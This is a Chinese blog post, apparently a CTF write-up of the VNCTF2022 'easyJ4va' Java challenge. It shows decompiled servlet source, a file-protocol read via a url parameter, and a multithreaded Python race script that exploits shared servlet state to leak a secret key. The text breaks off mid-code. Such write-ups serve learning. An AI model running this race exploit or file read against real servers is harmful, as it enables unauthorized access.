
<!DOCTYPE html>
<html>
<head>
     

<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0">
<title>从CTF题了解Servlet的线程安全问题 | ch1e的随笔</title>
<meta name="author" content="ch1e">
<meta name="copyright" content="ch1e">

<link rel="shortcut icon" href="https://ch1e.cn/img/favicon.ico"> 


    <meta name="keywords" content="ch1e的随笔">



     
    <meta name="description" content="前言VNCTF2022_easyJ4va  源于前几天打的VNCTF，这题自己尝试做了一下午，感觉确实可以，就拿来复盘一下，比赛做一下午没做出来，这里直接拿他读出来的源码进行复现吧，如果有想学习的师傅可以加我公告里的qq来拿源码试着做一下 正文涉及知识点个人感觉其中获取key的过程涉及到Servlet的线程安全问题，这里具体可以看一下Y4师傅的文章，给出文章地址 Servlet的线程安全问题，获取">
<meta property="og:type" content="article">
<meta property="og:title" content="从CTF题了解Servlet的线程安全问题">
<meta property="og:url" content="https://ch1e.cn/2022/02/13/easyj4va/">
<meta property="og:site_name" content="ch1e的随笔">
<meta property="og:description" content="前言VNCTF2022_easyJ4va  源于前几天打的VNCTF，这题自己尝试做了一下午，感觉确实可以，就拿来复盘一下，比赛做一下午没做出来，这里直接拿他读出来的源码进行复现吧，如果有想学习的师傅可以加我公告里的qq来拿源码试着做一下 正文涉及知识点个人感觉其中获取key的过程涉及到Servlet的线程安全问题，这里具体可以看一下Y4师傅的文章，给出文章地址 Servlet的线程安全问题，获取">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://q4.qlogo.cn/headimg_dl?dst_uin=1444440144&spec=100">
<meta property="article:published_time" content="2022-02-13T14:17:36.146Z">
<meta property="article:modified_time" content="2022-04-11T09:39:13.109Z">
<meta property="article:author" content="ch1e">
<meta property="article:tag" content="ch1e的随笔">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://q4.qlogo.cn/headimg_dl?dst_uin=1444440144&spec=100">
 

<meta http-equiv="Cache-Control" content="no-siteapp"/>
<link href="//cdn.jsdelivr.net" rel="preconnect">
<link href="https://ch1e.cn" rel="prefetch">
<link href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css " rel="stylesheet">
<link href="/css/main.css " rel="stylesheet">
<script src="/js/utlis.js"></script>
 
    
 

<meta name="generator" content="Hexo 5.4.0"></head>

<body>
     
    
 
     

<script>
    var $config = {
        tocStyle: "visible",
        CDN:{
            fancyboxJs: "https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js",
            fancyboxCss: "https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css"
        },
        
        
    }
</script>
    




  


    <div id="body-wrap">
        <nav id="nav-wrap">
  <div class="navbar">
    <div class="bar">
      <a href="/" class="title">ch1e的随笔</a>

      
      <ul class="menu">
         
        <li><a href="/">首页</a></li>
          
        <li>
          <a class="menu-child-hover" href="javascript:void(0);">找文章</a>
          <ul class="menu-child">
            
            <li><a href='/tags'>标签</a></li>
            
            <li><a href='/archives'>归档</a></li>
            
          </ul>
        </li>
          
        <li><a href="/link">友情链接</a></li>
         
      </ul>
      <i class="fas fa-bars open-nav"></i>
    </div>
  </div>
  <div id="mobile-nav">
    <ul>
       
      <li><a href="/">首页</a></li>
         
      <li><a href='/tags'>标签</a></li>
      
      <li><a href='/archives'>归档</a></li>
         
      <li><a href="/link">友情链接</a></li>
       
    </ul>
  </div>
</nav>


        <main id="main">
            

<article id="post">
  <div class="post-info">
    <div class="post-title">
      <h1>从CTF题了解Servlet的线程安全问题</h1>
    </div>
    <div class="post-meta">
      <div class="post-date">
        <i class="far fa-calendar-alt fa-fw post-meta-icon"></i>
        <span class="post-meta-label">
          发表于
            2022-02-13 |
        </span>
        
        <i class="fas fa-history fa-fw post-meta-icon"></i>
        <span class="post-meta-label">
          更新于
            2022-04-17
        </span>
      </div>
      <div class="post-meta-wordcount">
        <i class="far fa-file-word fa-fw post-meta-icon"></i>
        <span class="post-meta-label">总字数:</span>
        <span class="word-count">2.4k | </span>
        <i class="far fa-clock fa-fw post-meta-icon"></i>
        <span class="post-meta-label">阅读时长:</span>
        <span>11分钟</span>
        
      </div>
    </div>
  </div>
  <div class="post-content">
    <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>VNCTF2022_easyJ4va  源于前几天打的VNCTF，这题自己尝试做了一下午，感觉确实可以，就拿来复盘一下，比赛做一下午没做出来，这里直接拿他读出来的源码进行复现吧，如果有想学习的师傅可以加我公告里的qq来拿源码试着做一下</p>
<h1 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h1><h2 id="涉及知识点"><a href="#涉及知识点" class="headerlink" title="涉及知识点"></a>涉及知识点</h2><p>个人感觉其中获取key的过程涉及到Servlet的线程安全问题，这里具体可以看一下Y4师傅的文章，给出文章地址 <a target="_blank" rel="noopener" href="https://y4tacker.github.io/2022/02/03/year/2022/2/Servlet%E7%9A%84%E7%BA%BF%E7%A8%8B%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98/">Servlet的线程安全问题</a>，获取flag的过程涉及到java-Transient关键字的问题，这里给出文章地址  <a target="_blank" rel="noopener" href="https://blog.csdn.net/u010156024/article/details/48345257?utm_medium=distribute.wap_aggpage_search_result.none-task-blog-2~aggregatepage~first_rank_ecpm_v1~rank_v31_ecpm-1-48345257.wap_agg_so&utm_term=volatile%E5%BA%8F%E5%88%97%E5%8C%96">java-Transient关键字、Volatile关键字介绍和序列化、反序列化机制、单例类序列化</a></p>
<p>然后接下来具体看题吧</p>
<h2 id="复现过程"><a href="#复现过程" class="headerlink" title="复现过程"></a>复现过程</h2><p>打开环境，提示我们/file?,可以想到这里应该是让我们在/file路径下get传入一个参数，访问/file提示输入url，大概就是让我们访问/file?url=xxxx，这里有经验的师傅就大概可以猜到存在类似于SSRF或者读文件漏洞，这里直接上了file协议，读取出他的源码。这就一步带过了，因为太简单了。</p>
<p><img src="https://ch1e-img.oss-cn-beijing.aliyuncs.com/img/image-20220411173846821.png" alt="image-20220411173846821"></p>
<p>读出来源代码以后我们直接进行审计，这就是一个Servlet对象，具体来看一下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Source code recreated from a .class file by IntelliJ IDEA</span></span><br><span class="line"><span class="comment">// (powered by FernFlower decompiler)</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">package</span> servlet;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> entity.User;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.util.Base64;</span><br><span class="line"><span class="keyword">import</span> java.util.Base64.Decoder;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.ServletException;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.ServletOutputStream;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.annotation.WebServlet;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServlet;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletRequest;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletResponse;</span><br><span class="line"><span class="keyword">import</span> util.Secr3t;</span><br><span class="line"><span class="keyword">import</span> util.SerAndDe;</span><br><span class="line"></span><br><span class="line"><span class="meta">@WebServlet(</span></span><br><span class="line"><span class="meta">    name = &quot;HelloServlet&quot;,</span></span><br><span class="line"><span class="meta">    urlPatterns = &#123;&quot;/evi1&quot;&#125;</span></span><br><span class="line"><span class="meta">)</span></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">HelloWorldServlet</span> <span class="keyword">extends</span> <span class="title">HttpServlet</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">volatile</span> String name = <span class="string">&quot;m4n_q1u_666&quot;</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">volatile</span> String age = <span class="string">&quot;666&quot;</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">volatile</span> String height = <span class="string">&quot;180&quot;</span>;</span><br><span class="line">    User user;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">HelloWorldServlet</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">init</span><span class="params">()</span> <span class="keyword">throws</span> ServletException </span>&#123;</span><br><span class="line">        <span class="keyword">this</span>.user = <span class="keyword">new</span> User(<span class="keyword">this</span>.name, <span class="keyword">this</span>.age, <span class="keyword">this</span>.height);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">doGet</span><span class="params">(HttpServletRequest req, HttpServletResponse resp)</span> <span class="keyword">throws</span> ServletException, IOException </span>&#123;</span><br><span class="line">        String reqName = req.getParameter(<span class="string">&quot;name&quot;</span>);</span><br><span class="line">        <span class="keyword">if</span> (reqName != <span class="keyword">null</span>) &#123;</span><br><span class="line">            <span class="keyword">this</span>.name = reqName;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (Secr3t.check(<span class="keyword">this</span>.name)) &#123;</span><br><span class="line">            <span class="keyword">this</span>.Response(resp, <span class="string">&quot;no vnctf2022!&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">if</span> (Secr3t.check(<span class="keyword">this</span>.name)) &#123;</span><br><span class="line">                <span class="keyword">this</span>.Response(resp, <span class="string">&quot;The Key is &quot;</span> + Secr3t.getKey());</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">doPost</span><span class="params">(HttpServletRequest req, HttpServletResponse resp)</span> <span class="keyword">throws</span> ServletException, IOException </span>&#123;</span><br><span class="line">        String key = req.getParameter(<span class="string">&quot;key&quot;</span>);</span><br><span class="line">        String text = req.getParameter(<span class="string">&quot;base64&quot;</span>);</span><br><span class="line">        <span class="keyword">if</span> (Secr3t.getKey().equals(key) &amp;&amp; text != <span class="keyword">null</span>) &#123;</span><br><span class="line">            Decoder decoder = Base64.getDecoder();</span><br><span class="line">            <span class="keyword">byte</span>[] textByte = decoder.decode(text);</span><br><span class="line">            User u = (User)SerAndDe.deserialize(textByte);</span><br><span class="line">            <span class="keyword">if</span> (<span class="keyword">this</span>.user.equals(u)) &#123;</span><br><span class="line">                <span class="keyword">this</span>.Response(resp, <span class="string">&quot;Deserialize…… Flag is &quot;</span> + Secr3t.getFlag().toString());</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">this</span>.Response(resp, <span class="string">&quot;KeyError&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">Response</span><span class="params">(HttpServletResponse resp, String outStr)</span> <span class="keyword">throws</span> IOException </span>&#123;</span><br><span class="line">        ServletOutputStream out = resp.getOutputStream();</span><br><span class="line">        out.write(outStr.getBytes());</span><br><span class="line">        out.flush();</span><br><span class="line">        out.close();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>首先我们需要关注的是如何获取到Flag,因此我们可以看到在doPost()方法里面有这么一段代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if (this.user.equals(u)) &#123;</span><br><span class="line">    this.Response(resp, &quot;Deserialize…… Flag is &quot; + Secr3t.getFlag().toString());</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>要想要得到flag，必须要user和u相等，继续往上看，u是经过SerAndDe.deserialize(textByte);以后进行强制类型转换的结果，然后继续往上，可以看到一个if判断，需要拿到flag必须要先进入判断，必须要让如下代码结果为true</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Secr3t.getKey().equals(key) &amp;&amp; text != null</span><br></pre></td></tr></table></figure>

<p>text是接收的一个base64参数，因此我们要让Secr3t.getKey()=key，下面给出Secr3t的源码，阅读了Secr3t的源码可以知道，我们需要先获取到一个key，key是要在HelloWorldServlet里的doGet()方法进行获取</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Source code recreated from a .class file by IntelliJ IDEA</span></span><br><span class="line"><span class="comment">// (powered by FernFlower decompiler)</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">package</span> util;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.BufferedReader;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStreamReader;</span><br><span class="line"><span class="keyword">import</span> org.apache.commons.lang3.RandomStringUtils;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Secr3t</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> String Key = RandomStringUtils.randomAlphanumeric(<span class="number">32</span>);</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> StringBuffer Flag;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">private</span> <span class="title">Secr3t</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title">getKey</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> Key;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> StringBuffer <span class="title">getFlag</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        Flag = <span class="keyword">new</span> StringBuffer();</span><br><span class="line">        InputStream in = <span class="keyword">null</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            in = Runtime.getRuntime().exec(<span class="string">&quot;/readflag&quot;</span>).getInputStream();</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException var12) &#123;</span><br><span class="line">            var12.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        BufferedReader read = <span class="keyword">new</span> BufferedReader(<span class="keyword">new</span> InputStreamReader(in));</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            String line = <span class="keyword">null</span>;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">while</span>((line = read.readLine()) != <span class="keyword">null</span>) &#123;</span><br><span class="line">                Flag.append(line + <span class="string">&quot;\n&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">catch</span> (IOException var13) &#123;</span><br><span class="line">            var13.printStackTrace();</span><br><span class="line">        &#125; <span class="keyword">finally</span> &#123;</span><br><span class="line">            <span class="keyword">try</span> &#123;</span><br><span class="line">                in.close();</span><br><span class="line">                read.close();</span><br><span class="line">            &#125; <span class="keyword">catch</span> (IOException var11) &#123;</span><br><span class="line">                var11.printStackTrace();</span><br><span class="line">                System.out.println(<span class="string">&quot;Secr3t : io exception!&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> Flag;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">boolean</span> <span class="title">check</span><span class="params">(String checkStr)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;vnctf2022&quot;</span>.equals(checkStr);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>获取key的主要代码如下:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">doGet</span><span class="params">(HttpServletRequest req, HttpServletResponse resp)</span> <span class="keyword">throws</span> ServletException, IOException </span>&#123;</span><br><span class="line">    String reqName = req.getParameter(<span class="string">&quot;name&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span> (reqName != <span class="keyword">null</span>) &#123;</span><br><span class="line">        <span class="keyword">this</span>.name = reqName;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (Secr3t.check(<span class="keyword">this</span>.name)) &#123;</span><br><span class="line">        <span class="keyword">this</span>.Response(resp, <span class="string">&quot;no vnctf2022!&quot;</span>);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">if</span> (Secr3t.check(<span class="keyword">this</span>.name)) &#123;</span><br><span class="line">            <span class="keyword">this</span>.Response(resp, <span class="string">&quot;The Key is &quot;</span> + Secr3t.getKey());</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里需要传入一个name参数，但是这里比较奇怪，又要让你Secr3t.check(this.name)结果为false，又要在else里的Secr3t.check(this.name)结果为true，这就有意思了，正常来说确实不可能，但是看了Y4师傅的那篇文章后可以知道多个客户端一起访问时，得到的是同一个Servlet，这就会造成别人对实例变量的修改会影响另外一个客户端。所以这里要拿到key，只需要用多线程来写，让他在一个线程为真的时候，另外一个线程为假，给出python脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> io</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"></span><br><span class="line">url = <span class="string">&#x27;http://1.13.163.248:8081/evi1?name=&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">white</span>(<span class="params">session</span>):</span></span><br><span class="line">    <span class="keyword">while</span> event.isSet():</span><br><span class="line">        res = session.get(url=url+<span class="string">&quot;vnctf2022&quot;</span>).text</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;Key&#x27;</span> <span class="keyword">in</span> res:</span><br><span class="line">            <span class="built_in">print</span>(res)</span><br><span class="line">            event.clear()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">black</span>(<span class="params">session</span>):</span></span><br><span class="line">    <span class="keyword">while</span> event.isSet():</span><br><span class="line">        res = session.get(url=url + <span class="string">&quot;vnctf2021&quot;</span>).text</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;Key&#x27;</span> <span class="keyword">in</span> res:</span><br><span class="line">            <span class="built_in">print</span>(res)</span><br><span class="line">            event.clear()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    event = threading.Event()</span><br><span class="line">    event.<span class="built_in">set</span>()</span><br><span class="line">    <span class="keyword">with</span> requests.session() <span class="keyword">as</span> session:</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">30</span>):</span><br><span class="line">            threading.Thread(target=white, args=(session,)).start()</span><br><span class="line"></span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>, <span class="number">30</span>):</span><br><span class="line">            threading.Thread(target=black, args=(session,)).start()</span><br></pre></td></tr></table></figure>

<p>这里的话我当时跑出来的key是lDZHZ96itWAnjtaq9Xnqj2sfcn2SRqF1，图忘记保存了，这里拿到了key，接下来直接拿flag即可，获取flag的方法刚刚已经放出来了，就有个user可能不知道，user是类里面的一个User类的属性，User类如下</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Source code recreated from a .class file by IntelliJ IDEA</span></span><br><span class="line"><span class="comment">// (powered by FernFlower decompiler)</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">package</span> entity;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.Serializable;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">User</span> <span class="keyword">implements</span> <span class="title">Serializable</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> String name;</span><br><span class="line">    <span class="keyword">private</span> String age;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">transient</span> String height;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="title">User</span><span class="params">(String name, String age, String height)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">this</span>.name = name;</span><br><span class="line">        <span class="keyword">this</span>.age = age;</span><br><span class="line">        <span class="keyword">this</span>.height = height;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> String <span class="title">getName</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">this</span>.name;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setName</span><span class="params">(String name)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">this</span>.name = name;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> String <span class="title">getAge</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">this</span>.age;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setAge</span><span class="params">(String age)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">this</span>.age = age;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> String <span class="title">getHeight</span><span class="params">()</span> </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">this</span>.height;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">void</span> <span class="title">setHeight</span><span class="params">(String height)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">this</span>.height = height;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title">readObject</span><span class="params">(ObjectInputStream s)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException </span>&#123;</span><br><span class="line">        s.defaultReadObject();</span><br><span class="line">        <span class="keyword">this</span>.height = (String)s.readObject();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">boolean</span> <span class="title">equals</span><span class="params">(Object obj)</span> </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (obj == <span class="keyword">null</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="keyword">this</span> == obj) &#123;</span><br><span class="line">            <span 